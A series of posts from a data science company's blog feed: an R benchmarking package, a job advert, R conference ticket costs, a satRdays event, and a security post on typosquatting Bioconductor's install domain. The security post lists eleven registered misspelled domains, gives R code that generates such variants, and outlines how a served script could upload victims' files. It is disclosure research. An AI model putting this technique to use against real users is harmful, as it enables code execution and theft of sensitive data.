&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res_io &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_std&lt;/span&gt;(runs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, cores &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="previous-versions-of-the-package"&gt;Previous versions of the package&lt;/h2&gt;
&lt;p&gt;This package was started around 2015. However, multiple changes in the byte compiler over the last few years have made it very difficult to use previous results. Essentially, detecting if and how the byte compiler was being used became nigh on impossible. Also, R has just &amp;ldquo;got faster&amp;rdquo;, so it doesn&amp;rsquo;t make sense to compare benchmarks between different R versions. So we have to start from scratch (I did spend a few days trying to salvage something but to no avail).&lt;/p&gt;
&lt;p&gt;The previous data can be obtained via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(past_results, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkmeData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="machine-specs"&gt;Machine specs&lt;/h2&gt;
&lt;p&gt;The package has a few useful functions for extracting system specs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;RAM: &lt;code&gt;get_ram()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;CPUs: &lt;code&gt;get_cpu()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;BLAS library: &lt;code&gt;get_linear_algebra()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Is byte compiling enabled: &lt;code&gt;get_byte_compiler()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;General platform info: &lt;code&gt;get_platform_info()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;R version: &lt;code&gt;get_r_version()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The above functions have been tested on a number of systems. If they don’t work on your system, please raise a &lt;a href="https://github.com/csgillespie/benchmarkme/issues" rel="external"&gt;GitHub&lt;/a&gt; issue.&lt;/p&gt;
&lt;h2 id="uploaded-datasets"&gt;Uploaded datasets&lt;/h2&gt;
&lt;p&gt;A summary of the uploaded datasets is available in the &lt;a href="https://github.com/csgillespie/benchmarkme-data" rel="external"&gt;benchmarkmeData&lt;/a&gt; package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(past_results_v2, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkmeData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A column of this data set contains the unique identifier returned by the &lt;code&gt;upload_results()&lt;/code&gt; function.&lt;/p&gt;
&lt;h2 id="whats-uploaded"&gt;What’s uploaded&lt;/h2&gt;
&lt;p&gt;Two objects are uploaded:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Your benchmarks from &lt;code&gt;benchmark_std&lt;/code&gt; or &lt;code&gt;benchmark_io&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;A summary of your system information (&lt;code&gt;get_sys_details()&lt;/code&gt;).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &lt;code&gt;get_sys_details()&lt;/code&gt; function returns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Sys.info()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_platform_info()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_r_version()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_ram()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_cpu()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_byte_compiler()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_linear_algebra()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;installed.packages()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Sys.getlocale()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;benchmarkme&lt;/code&gt; version number;&lt;/li&gt;
&lt;li&gt;Unique ID - used to extract results;&lt;/li&gt;
&lt;li&gt;The current date.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The function &lt;code&gt;Sys.info()&lt;/code&gt; does include the user and nodenames. In the public release of the data, this information will be removed. If you don’t wish to upload certain information, just set the corresponding argument, i.e.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;upload_results&lt;/span&gt;(res, args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(sys_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/benchmarkme-new-version/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>We're Hiring: Data Scientist</title><link>https://www.jumpingrivers.com/blog/were-hiring-data-scientist/</link><pubDate>Mon, 28 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/were-hiring-data-scientist/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/were-hiring-data-scientist/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/were-hiring-data-scientist/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jumping Rivers is a data science company based in Newcastle. We are not sector based and our clients span all industries. We are looking for individuals who enjoy a challenge.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Main Duties&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Technical Duties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Provide technical training&lt;/li&gt;
&lt;li&gt;Development of bespoke statistical algorithms.&lt;/li&gt;
&lt;li&gt;Building web applications using R and Shiny.&lt;/li&gt;
&lt;li&gt;Data analysis using R and/or Python.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Client contact:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend on-site client meetings&lt;/li&gt;
&lt;li&gt;Off-site meetings via video conference call&lt;/li&gt;
&lt;li&gt;Training on site&lt;/li&gt;
&lt;li&gt;Develop a plan of action for consultancy.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Other duties&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attending conferences, such as useR!&lt;/li&gt;
&lt;li&gt;Promote the company via Twitter, LinkedIn, StackOverflow and Kaggle.&lt;/li&gt;
&lt;li&gt;Write blog posts.&lt;/li&gt;
&lt;li&gt;Complete timesheets and reports for clients&lt;/li&gt;
&lt;li&gt;Manage your project board&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ability to travel to client sites (including international travel). The applicant will work from home. Applicants must have the right to work in the UK.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Experience&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Candidates should have a BSc (at least a 2.2) or equivalent in statistics, mathematics or relevant scientific discipline. They should have a working knowledge of programming.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Desirable (but not essential)&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Knowledge of statistical and/or machine learning algorithms&lt;/li&gt;
&lt;li&gt;Programming experience with R, Python, Matlab or Java&lt;/li&gt;
&lt;li&gt;Web experience.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You should have the relevant permissions to work in the UK&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/were-hiring-data-scientist/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Conference Costs v2.0</title><link>https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/</link><pubDate>Fri, 25 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/r-conference-costs.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-conference-costs"&gt;R conference Costs&lt;/h1&gt;
&lt;p&gt;Last year we gave you a price breakdown of some of the most popular R conferences around the globe for 2017. We’re going to do it again for 2018. Remember, you can get up-to-date information on upcoming conferences via our &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;GitHub&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;It’s important to note that these costs are the prices of an industry ticket for the conference &lt;em&gt;only&lt;/em&gt;. If you bought an early-bird ticket and are an academic or student, you could see these prices fall by over 50% in some cases. I’ll also mention extra pricing below.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Conference&lt;/th&gt;
&lt;th&gt;Cost($)&lt;/th&gt;
&lt;th&gt;#Days&lt;/th&gt;
&lt;th&gt;Cost/Day&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;rstudio::conf 2019&lt;/td&gt;
&lt;td&gt;795&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;398&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;eRum 2018&lt;/td&gt;
&lt;td&gt;311&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;104&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WhyR 2018&lt;/td&gt;
&lt;td&gt;170&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;42&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Earl London 2018&lt;/td&gt;
&lt;td&gt;1170&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;390&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;satRday Amsterdam 2018&lt;/td&gt;
&lt;td&gt;45&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;45&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New York R&lt;/td&gt;
&lt;td&gt;750&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;375&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
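&lt;p&gt;The Cost/Day column is simply the ticket price divided by the number of days, rounded to the nearest dollar. Here is a minimal sketch that recomputes it from the figures in the table; the data frame and column names are our own choice for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Ticket prices (in dollars) and lengths (in days) copied from the table
conf_costs = data.frame(
  conference = c("rstudio::conf 2019", "eRum 2018", "WhyR 2018",
                 "Earl London 2018", "satRday Amsterdam 2018", "New York R"),
  cost = c(795, 311, 170, 1170, 45, 750),
  days = c(2, 3, 4, 3, 1, 2)
)

# Cost per day, rounded to a whole dollar
conf_costs$cost_per_day = round(conf_costs$cost / conf_costs$days)

# Cheapest per day first
conf_costs[order(conf_costs$cost_per_day), ]
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Sorting by cost per day makes the gap between the community-run events and the commercial conferences easy to see.&lt;/p&gt;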
&lt;p&gt;Now, with add-ons it could have been a whole different story. For example, if you wanted to attend any of the 1 or 2-day workshops for rstudio::conf 2018 before the actual conference, you’re looking at an extra $995 to $1,500 overall. However, conferences like eRum and WhyR have no extra pricing.&lt;/p&gt;
&lt;img class="image-center" src="r-conference-costs.svg" style="width:550px; class:image-center"&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-r-conference-costs-v2-0"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="cost-but-what-about-"&gt;Cost, but what about &amp;hellip;&lt;/h2&gt;
&lt;p&gt;Clearly, the cost is only one of many factors used when deciding to attend a conference. Location, networking, date and speakers all play a part. In particular, we are planning on attending the &lt;code&gt;rstudio::conf&lt;/code&gt; in 2020, even though it&amp;rsquo;s one of the more expensive events (but it looks fantastic!). In fact, next year the conference is in San Francisco (Jan 27-30th, 2020). The first 100 ticket purchasers will get the special &lt;a href="https://web.cvent.com/event/36ebe042-0113-44f1-8e36-b9bc5d0733bf/summary" rel="external"&gt;price of $450!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>satRdays Newcastle 2019 Conference is Here!</title><link>https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/</link><pubDate>Fri, 25 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are pleased to announce the very first &lt;a href="https://satrdays.org" rel="external"&gt;satRday&lt;/a&gt; event in Newcastle upon Tyne (and England). &lt;a href="https://newcastle2019.satrdays.org/" rel="external"&gt;satRdays Newcastle&lt;/a&gt; is a one-day, low-cost, community-organised R conference in the heart of Newcastle City Centre.&lt;/p&gt;
&lt;h2 id="where"&gt;Where?&lt;/h2&gt;
&lt;p&gt;The event will be held at &lt;a href="https://goo.gl/maps/MW26aGn6tN12" rel="external"&gt;Newcastle University&lt;/a&gt;. Getting to Newcastle is really easy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Train: 90 minutes from Edinburgh or 3 hours from London. The train station is in the middle of Newcastle.&lt;/li&gt;
&lt;li&gt;Plane: Direct flights from Schiphol, Paris, Stansted, Heathrow, Dublin, Belfast. The airport is only 15 minutes from the city centre by taxi.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Of course, we won&amp;rsquo;t suggest you attend this conference and use it as an excuse for a holiday&amp;hellip;&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-satrdays-newcastle-2019-conference"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="when"&gt;When?&lt;/h2&gt;
&lt;p&gt;Saturday April 6th, 9am to 5pm&lt;/p&gt;
&lt;h2 id="who"&gt;Who?&lt;/h2&gt;
&lt;p&gt;Our keynote speakers include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Robin Lovelace&lt;/em&gt;, a Leeds University Academic Fellow&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Noa Tamir&lt;/em&gt;, Director of Data Science at the AUTO1 Group&lt;/li&gt;
&lt;li&gt;Guest speaker from RStudio TBA&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="how-much"&gt;How much?&lt;/h2&gt;
&lt;p&gt;Early bird tickets are on sale now for a very modest &lt;strong&gt;&lt;em&gt;£20&lt;/em&gt;&lt;/strong&gt;! (Yes you read that correctly). Hurry though, as the early bird promotion will end on 1st February, after which tickets will increase to £30.&lt;/p&gt;
&lt;h2 id="can-i-get-involved"&gt;Can I get involved?&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Yes&lt;/em&gt;&lt;/strong&gt;!&lt;/p&gt;
&lt;p&gt;If you want to speak, we are accepting talk submissions right up until 16th February. Simply submit an &lt;a href="https://sessionize.com/satrdays-newcastle-2019" rel="external"&gt;abstract&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you need any more details, visit &lt;a href="https://newcastle2019.satrdays.org/" rel="external"&gt;newcastle2019.satRdays.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Cheers!&lt;/p&gt;
&lt;img class="image-center" src="newcastle-bridge.jpg" style="width:500px; class:image-center"&gt;
&lt;h3 id="picture-credit"&gt;Picture Credit&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.instagram.com/dbiltonphotography/" rel="external"&gt;Dan Bilton&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hacking Bioconductor</title><link>https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/</link><pubDate>Mon, 19 Nov 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Domain squatting or URL hijacking is a straightforward attack that requires little skill. An attacker registers a domain that is similar to the target domain and hopes that a user accidentally visits the site. For example, if the domain is &lt;code&gt;example.com&lt;/code&gt;, then a typo-squatter would register similar domains such as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;common misspelling: &lt;code&gt;examples.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;misspellings based on omitted letters: &lt;code&gt;exampl.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;misspellings based on typos: &lt;code&gt;ezample.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;a different top-level domain: &lt;code&gt;example.co.uk&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The cost of registering a single domain is approximately £10 for two years.&lt;/p&gt;
&lt;p&gt;With the rise of data science and the widespread use of tools such as R, Python and Matlab, programming has moved from the domain of computing scientists to users who have no formal training. Coupled with this is the vast number of additional free packages available. For example, R has over 12,000 packages on its main repository, CRAN. These packages cover everything from clinical trials to machine learning. Installation of these packages does not go through a traditional IT approach, where a user contacts their IT officer asking for packages to be installed. Instead, users simply install the required packages on their own machine. Crucially, installing these packages does not require admin rights. This shift from a centrally managed IT infrastructure to a user-centred approach can be difficult to manage.&lt;/p&gt;
&lt;h2 id="example-bioconductor-project"&gt;Example: Bioconductor project&lt;/h2&gt;
&lt;p&gt;To make this article concrete, while simultaneously not overstepping the ethical bounds, we used URL hijacking to target &lt;a href="https://bioconductor.org/" rel="external"&gt;Bioconductor&lt;/a&gt;. The Bioconductor project provides tools for the analysis and understanding of high-throughput genomic data. The project uses the R programming language and has over 1,300 associated R packages.&lt;/p&gt;
&lt;p&gt;To install Bioconductor, users are instructed to run the R script&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;source&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://bioconductor.org/biocLite.R&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This loads the &lt;code&gt;biocLite()&lt;/code&gt; function that enables installation of other R packages. Two points are worth noting:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Bioconductor has a large user community.&lt;/li&gt;
&lt;li&gt;The typical Bioconductor user is analysing cutting-edge biological datasets and therefore likely to be in a University, pharmaceutical company, or government agency. Their data is almost certainly sensitive, which could include patient data or results on upcoming drug trials.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We registered eleven domains: biconductor.org, biocnductor.org, biocoductor.org, biocondctor.org, bioconducor.org, bioconducto.org, bioconductr.org, biocondutor.org, bioconuctor.org, bioonductor.org, boconductor.org&lt;/p&gt;
&lt;p&gt;Each domain name is a simple misspelling of &lt;strong&gt;bioconductor&lt;/strong&gt;.&lt;/p&gt;
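&lt;p&gt;As an illustration of how little effort this takes, the eleven names above are all single-letter omissions of &lt;strong&gt;bioconductor&lt;/strong&gt;. The following is a minimal base R sketch that enumerates such variants. The helper name &lt;code&gt;drop_one_letter()&lt;/code&gt; is hypothetical; this is an illustration, not a record of how the list was produced.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: every variant of `name` with exactly one character removed
drop_one_letter = function(name) {
  chars = strsplit(name, &amp;#34;&amp;#34;)[[1]]
  variants = vapply(
    seq_along(chars),
    function(i) paste(chars[-i], collapse = &amp;#34;&amp;#34;),
    character(1)
  )
  unique(variants)
}

variants = drop_one_letter(&amp;#34;bioconductor&amp;#34;)
paste0(variants, &amp;#34;.org&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For this twelve-letter name the sketch yields twelve candidates, which include all eleven domains listed above.&lt;/p&gt;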
&lt;p&gt;When the &lt;code&gt;source()&lt;/code&gt; function is used to access a website, it sends a &lt;em&gt;user agent&lt;/em&gt; giving the version of R being used and the operating system. For example, the user agent&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;indicates R version 3.4.2 on a Windows machine. The machine&amp;rsquo;s location (IP address) is also passed to the server. Whenever a machine accesses a domain, this information is automatically recorded.&lt;/p&gt;
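&lt;p&gt;To show how much a single log entry reveals, here is a small base R sketch that splits the example user agent above into its parts. The field names are labels chosen for illustration. In a running session, the string R sends is typically available via &lt;code&gt;getOption(&amp;#34;HTTPUserAgent&amp;#34;)&lt;/code&gt;, although front ends may override it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;ua = &amp;#34;R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)&amp;#34;

# Strip the leading &amp;#34;R (&amp;#34; and the trailing &amp;#34;)&amp;#34;, then split on spaces
fields = strsplit(gsub(&amp;#34;^R \\(|\\)$&amp;#34;, &amp;#34;&amp;#34;, ua), &amp;#34; &amp;#34;)[[1]]
names(fields) = c(&amp;#34;version&amp;#34;, &amp;#34;platform&amp;#34;, &amp;#34;arch&amp;#34;, &amp;#34;os&amp;#34;)  # illustrative labels

fields[[&amp;#34;version&amp;#34;]]
fields[[&amp;#34;os&amp;#34;]]
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;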
&lt;p&gt;For each of the eleven domains, we monitored the server logs for occurrences of the R user-agent. Whenever anyone accessed our rogue domains we always returned a 404 (not found) error message. It is worth noting that while SSL (&lt;strong&gt;https&lt;/strong&gt;) is essential for a secure connection, in this scenario it just provides a secure connection to the rogue domain, i.e. it does not offer any additional protection.&lt;/p&gt;
&lt;h3 id="did-it-work"&gt;Did it work?&lt;/h3&gt;
&lt;p&gt;We monitored the eleven domains for five months, starting in January 2018. As expected, some domains were clearly more popular than others. The top three domains, bioconducor.org, biconductor.org and biocondutor.org, accounted for most of the traffic.&lt;/p&gt;
&lt;img class="image-center" src="blog-security.png" style="width:550px; class:image-center"&gt;
&lt;p&gt;To avoid duplication, a particular IP address is only counted once per day. Only hits that had the R user agent are counted.&lt;/p&gt;
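&lt;p&gt;The counting rule can be sketched in a few lines of base R. The data frame below is made up for illustration (the IP addresses come from ranges reserved for documentation), and the column names are assumptions, not the format of the actual server logs.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Made-up log entries, one row per request
hits = data.frame(
  ip = c(&amp;#34;192.0.2.1&amp;#34;, &amp;#34;192.0.2.1&amp;#34;, &amp;#34;192.0.2.1&amp;#34;, &amp;#34;198.51.100.7&amp;#34;, &amp;#34;192.0.2.1&amp;#34;),
  date = as.Date(c(&amp;#34;2018-01-10&amp;#34;, &amp;#34;2018-01-10&amp;#34;, &amp;#34;2018-01-11&amp;#34;,
                   &amp;#34;2018-01-10&amp;#34;, &amp;#34;2018-01-11&amp;#34;)),
  user_agent = c(&amp;#34;R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)&amp;#34;,
                 &amp;#34;R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)&amp;#34;,
                 &amp;#34;R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)&amp;#34;,
                 &amp;#34;Mozilla/5.0&amp;#34;,
                 &amp;#34;R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)&amp;#34;),
  stringsAsFactors = FALSE
)

# Keep only requests that identify themselves as R
r_hits = hits[grepl(&amp;#34;^R \\(&amp;#34;, hits$user_agent), ]

# Count each IP address at most once per day
daily_hits = unique(r_hits[, c(&amp;#34;ip&amp;#34;, &amp;#34;date&amp;#34;)])
nrow(daily_hits)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;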
&lt;p&gt;In summary, the hits came from&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Thirty-three countries&lt;/li&gt;
&lt;li&gt;168 unique Universities, with most of the top 10 Universities in the world represented&lt;/li&gt;
&lt;li&gt;Many Research Institutes&lt;/li&gt;
&lt;li&gt;A number of Pharma companies and charities&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="is-it-really-a-big-deal"&gt;Is it really a big deal?&lt;/h3&gt;
&lt;p&gt;Once the user has executed our R script, we are free to run any R commands we wish. If the attacker has targeted users installing Bioconductor then they would probably look for commercially sensitive material.&lt;/p&gt;
&lt;p&gt;The first step for an attacker to retrieve information from a user&amp;rsquo;s machine would be to install the {httr} R package using the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;httr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This package provides functionality for uploading files to external web-servers. A more nefarious technique would be to detect whether Dropbox or another cloud storage system is installed on the machine and leverage that via an associated R package.&lt;/p&gt;
